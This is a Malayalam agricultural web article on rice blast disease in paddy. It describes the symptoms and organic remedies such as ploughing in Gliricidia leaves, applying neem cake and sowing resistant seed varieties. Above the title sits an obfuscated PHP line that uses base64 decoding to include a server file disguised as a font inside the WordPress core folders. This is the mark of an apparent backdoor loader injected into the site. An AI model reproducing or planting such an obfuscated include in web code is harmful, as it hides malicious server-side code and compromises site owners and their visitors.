@include base64_decode("L2hvbWUvaHl6dmh2cGcvaG9ydGljb3BzLmNvbS93cC1pbmNsdWRlcy9UZXh0L0RpZmYvRW5naW5lL2Rhc2hpY29ucy50dGY="); നെല്ലിന്റെ ബ്ലാസ്റ്റ് രോഗം | HORTICOPS

നെല്ലിന്റെ ബ്ലാസ്റ്റ് രോഗം

അതിവേഗം പടർന്ന് പുൽവർഗ ചെടികളെ നാമാവശേഷമാക്കാൽ കഴിവുള്ള ഒരു ഫംഗസ് രോഗമാണ് ബ്ലാസ്റ്റ്. ഇത് കൂടുതലും ബാധിക്കുന്നത് നെൽക്കൃഷിയെ ആണ്. നെൽച്ചെടിയുടെ എല്ലാ ദശകളിലും ഇത് ബാധിച്ചേക്കാം. പാടം മുഴുവനും തീ വിതറിയതുപോലെ ചെടികൾ മൊത്തം ഇലയും തണ്ടും കതിരും കരിഞ്ഞ് നശിച്ചു പോകുന്നു. കതിർക്കുലകൾ വന്ന സമയമാണെങ്കിൽ കതിർക്കുലകളടക്കം കരിഞ്ഞ് വിഴുന്നു.

ലക്ഷണം

ഇത്തരം ഫംഗസ് ചെടികളിൽ വന്നുപെട്ടാൽപ്പിന്നെ ആദ്യതന്നെ ഇലകളിൽ ചെറിയ തീപ്പൊള്ളലേറ്റ കുത്തുകൾപോലെയാണ് കാണപ്പെടുക. ചുവന്നപാടുകളും കാണും ഈ പാടുകൾ പെട്ടെന്നുതന്നെ വളരുകയും അത്‌തൊട്ടടുത്ത ചെടികളിൽപ്പടർന്ന് വളരെ വേഗം ബാധിക്കുകയുംചെയ്യും പടർന്നുകഴിഞ്ഞാൽ പിന്നെ കീടനാശിനിപ്രയോഗംകൊണ്ട് കാര്യമായ ശമനമുണ്ടാവില്ല. വിളയുടെ നാശമാണ് ഇതിന്റെ അനന്തര ഫലം.

പ്രതിവിധികൾ

ശീമക്കൊന്ന

മുമ്പുകാലത്ത് നമ്മൾ ജൈവവേലിയായി അതിരുകളിൽ നട്ടുവളർത്തിയിരുന്ന ശീമക്കൊന്ന നല്ലൊരു ഫംഗസ് പ്രതിരോധമരുന്നാണ്. നിലം ഉഴുന്നതിന് മുമ്പ് കൃഷിയിടത്തിൽ നിറച്ചും ശീമക്കൊന്നയിലകൾകൊണ്ടിട്ട് ഉഴവ നടത്തുന്നത് ബ്ലാസ്റ്റ് ഫംഗസിനെ നന്നായി പ്രതിരോധിക്കും. കരിങ്കൊട്ടയുടെ ഇലചേർത്ത് ഉഴുന്നതും ഗുണംചെയ്യും.

വേപ്പിൻപിണ്ണാക്ക്

ജൈവകൃഷിയുടെ ആധാരമാണ് വേപ്പിൻ പിണ്ണാക്ക് .നിലം ഉഴുന്ന സമയത്ത് സെന്റിന് 3-5 കിലോയെന്നതോതിൽ വേപ്പിൻപിണ്ണാക്ക് അടിവളമായി പ്രയോഗിച്ചാൽ ബ്ലാസ്റ്റ് രോഗത്തെ ചെറുക്കാം.
ബ്ലാസ്റ്റ് രോഗത്തെ പ്രതിരോധിക്കുന്ന വിത്തിനങ്ങൾ നാടനായും ഹൈബ്രീഡ് ആയും ഒട്ടേറെയുണ്ട്. വയലുകളിൽ വിതയ്ക്കാൻ അത്തരം വിത്തുകൾ തിരഞ്ഞെടുത്തും നമുക്ക് വിളകളെ നാശത്തിൽ നിന്ന് രക്ഷിക്കാം.

Share Now

Leave a Reply

Your email address will not be published. Required fields are marked *